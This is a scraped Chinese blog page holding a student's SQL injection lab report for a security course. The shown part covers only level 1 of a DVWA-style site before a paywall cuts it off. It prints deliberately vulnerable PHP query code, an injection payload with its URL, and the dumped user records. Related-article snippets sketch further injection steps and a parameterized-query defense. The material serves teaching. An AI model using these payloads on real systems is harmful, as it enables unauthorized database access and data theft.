SQL注入实验

最新推荐文章于 2025-05-27 15:01:42 发布
最新推荐文章于 2025-05-27 15:01:42 发布
阅读量6.4k 收藏 16
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 信息安全 文章标签: sql注入 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/rectsuly/article/details/62421118
本文详细记录了一次SQL注入实验,从安全等级1到5逐步破解的过程,包括注入方法和原理分析,展示了如何利用布尔连接符、宽字符注入等技巧绕过防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息安全实验 SQL Injection

一.实验内容

1.Finish all six challenge on the website,or give the reason why the protection is unbreakable(need an experiment report ).

2(Extended work).Tell me why [input = a’ or ‘1=1’ or ‘1=1] doesn’t work on the login website in your experiment report.

二.实验过程

  • 登陆实验网页:http://202.38.79.49:8888/login.php
    登陆界面如下:
    p1
  • 尝试输入默认用户名和用户密码:
    Username: admin
    Password: admin
  • 成功登入系统!系统界面如下:
    p2
    1.设置安全等级为1:Security Level = 1.
    注入界面如下:
    p3
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 根据以上代码可知,可以利用$id变量的漏洞进行sql注入,向User ID文本框中输入查询字符串1=1 or 1=1,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID:
最低0.47元/天 解锁文章

200万优质内容无限畅学
sql注入攻击实验
05-25
sql注入攻击,先自己搭建个网站,链接数据库必须用Sa链接
实验——SQL注入
weixin_44870846的博客
07-28 635
目录 利用SQL注入,将cms的后台管理的密码和用户破解出来 判断是否有回显 判断数据库是否有报错 判断是字符型还是数字型 判断是否有布尔类型状态 判断列数 判断显示位 输出数据库的名字 查询所有的表名 字段编码不同出现问题的解决方法 获取字段名 获得字段内容 MD5解密 利用SQL注入,将cms的后台管理的密码和用户破解出来 目标系统:cms网站 操作工具:hackbar 判断是否有回显 根据变换id,数据库中的内容是否回显在网页中判断 http://192..
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这篇就够了
Javachichi的博客
05-27 3627
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
深度学习案例之基于 CNN 的 MNIST 手写数字识别
fenglepeng的博客
09-07 6964
、模型结构 本文只涉及利用Tensorflow实现CNN的手写数字识别,CNN的内容请参考:卷积神经网络(CNN) MNIST数据集的格式与数据预处理代码input_data.py的讲解请参考 :Tutorial (2) 二、实验代码 # -*- coding: utf-8 -*- import tensorflow as tf # 导入input_data用于自动下载和安装MNIST数据集 from tensorflow.examples.tutorials.mnist import inpu
Sql注入实验
Nocker888的博客
11-11 557
Sql注入实验Sql 注入 实验 总结 青春经典当即永不再赎 不怕自己笨,就怕那些比自己笨的人比自己还要努力 Sql 注入 实验 在得到靶机的情况下,寻找带有参数的地方就有定有注入点。 开干,首先是判断注入点 payload如下: // 数字型判断 ?id=1 and 1=1 ?id=1 and 1=2 // 字符型判断 ?id=1' and...
网络信息安全实训【SQL注入
@MIKE小助手
06-17 995
🛢️SQL注入测试 ⭕实例代码,仅供测试⭕【1】搭建数据库基本环境 三、创建册用户页面 【1】先进入网页的根目录 【2】创建网页文件 打开效果: 打开效果: 【1】插入数据前数据库验证 【2】开始创建两个可用于实验的数据 【3】再次查看数据库【4】尝试正常登录检查 【5】使用正常的账号密码进行登录测试打开登录页面开始注入非法字符实现原理:直接恶意释原代码里面的数据库查询语句中的查询密码这项,导致密码验证直接失效实现无密码登录 这样就直接不需要密码就可以直接能够成功登录了。实现原理:直接.
网络安全——SQL注入实验
网络工程
12-12 5128
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证
简单SQL注入实验
qq_43518594的博客
10-30 3648
、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 二、SQL注入原理 情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
常规漏洞利用-sql注入实验指导书.pdf
08-03
在DVWA界面左侧选择SQL Injection标签页,进入SQL注入实验页面。在该页面,我们可以对SQL注入进行各种实验操作。 3. 判断SQL注入类型 实验首先要判断注入类型,即确定当前的注入点是字符型还是数字型。通过向userid...
sql注入实验
11-28
### SQL注入实验知识点详解 #### 实验背景及目标 **SQL注入**是种常见的网络安全威胁,主要针对使用结构化查询语言(SQL)进行数据处理的应用程序。本次实验旨在深入理解SQL注入攻击原理及其防御措施,通过实际...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
Web安全实践-SQL注入实验指南(Sqli-labs)
12-08
Web安全实践者通过执行SQL注入实验,能够深入理解SQL注入的原理,学习如何发现潜在的注入点,以及如何有效防护此类攻击。本文以sqli-labs为例,详细介绍了SQL注入实验的各个阶段,包括识别注入类型、猜测字段数、...
sql注入实验报告PDF
12-12
SQL注入种常见的网络攻击手段,它利用了应用程序对用户输入的处理不当,使得攻击者可以向后端数据库注入恶意的SQL代码。当数据库查询语句以不安全的方式从用户输入构建时,攻击者可以利用输入字段插入或修改SQL...
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 1018
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
SQL注入测试实验
weixin_43488742的博客
03-04 6225
SQL注入漏洞 1、工具安装 phpstudy与DVWA安装配置(默认用户名:admin,默认密码:password) (1)软件安装教程:https://datutu.blog.youkuaiyun.com/article/details/109323067?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycol
SQL注入攻防实验实验环境:Kali Linux;Windows Server 2003】
qq_62199249的博客
11-05 1444
(3)通过Kali内置的SQL Map进行自动注入,首先打开Kali的终端,进入SQL Map模块,然后将DVWA进入到SQL Injection模块,将URL地址复制下来输入到终端,然后加入Cookie,在选择要查询的内容,首先查询所有数据库名,因此要在尾部加上--dbs,查询结果如下。(10)由此可得到用户的账户名称和加密过的口令,该口令通过观察可知为MD5加密,通过解密工具解密后就可得到相应口令,Low级的手工注入完成。(4) 查询某个数据库下的所有表名(dvwa),指令如下,如图查询到两个表名。
【网络攻防技术】实验八——SQL注入实验
qq_45755706的博客
03-01 7570
文章目录实验题目二、实验步骤及结果Task 1: Get Familiar with SQL StatementsTask 2: SQL Injection Attack on SELECT StatementTask 2.1: SQL Injection Attack from webpage.Task 2.2: SQL Injection Attack from command line.Task 2.3: Append a new SQL statement.Task 3: SQL Injecti
SQL 注入实验
最新发布
06-14
### SQL 注入实验教程与防御方法 #### 实验教程 SQL注入实验旨在帮助学习者了解SQL注入攻击的工作原理以及如何利用工具检测系统中的漏洞。通过此实验,可以掌握常用的端口和漏洞扫描工具,并提升对SQL注入漏洞危害的认识[^1]。 以下是SQL注入实验的核心内容: - **目标检测**:使用端口和漏洞扫描工具(如Nmap、OpenVAS等)对目标系统进行扫描,发现开放的服务和可能存在的漏洞。 - **SQL注入测试**:尝试构造恶意的SQL语句,以验证目标系统是否存在SQL注入漏洞。例如,通过输入单引号 `'` 或其他特殊字符来观察系统的响应行为。 - **分析结果**:记录并分析实验过程中发现的漏洞,明确其成因及潜在危害。 #### 防御方法 为了有效防御SQL注入攻击,可以从以下几个方面入手: 1. **参数化查询** 使用参数化查询或预编译语句,确保用户输入的内容不会被直接解析为SQL代码。例如,在Python中可以使用以下代码实现安全查询: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "admin" password = "password123" # 参数化查询 cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password)) results = cursor.fetchall() ``` 2. **输入验证** 对用户输入的数据进行严格的验证和过滤,确保只允许合法的输入。例如,如果应用程序只需要用户输入数字,可以使用以下代码进行白名单过滤[^3]: ```python if not username.isdigit(): raise ValueError('Invalid username') ``` 3. **最小权限原则** 确保数据库用户的权限设置合理,仅授予其完成任务所需的最低权限。例如,避免使用具有管理员权限的账户连接数据库。 4. **空格绕过防御** 在某些情况下,攻击者可能通过替换空格来绕过简单的过滤规则。可以通过正则表达式或其他方法检测并阻止这些变种输入[^2]。 5. **错误信息控制** 避免在生产环境中显示详细的错误信息,防止攻击者利用这些信息推测数据库结构。 6. **定期更新与审计** 定期更新数据库管理系统及相关软件版本,修补已知漏洞。同时,对应用程序和数据库进行安全审计,及时发现并修复潜在问题。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值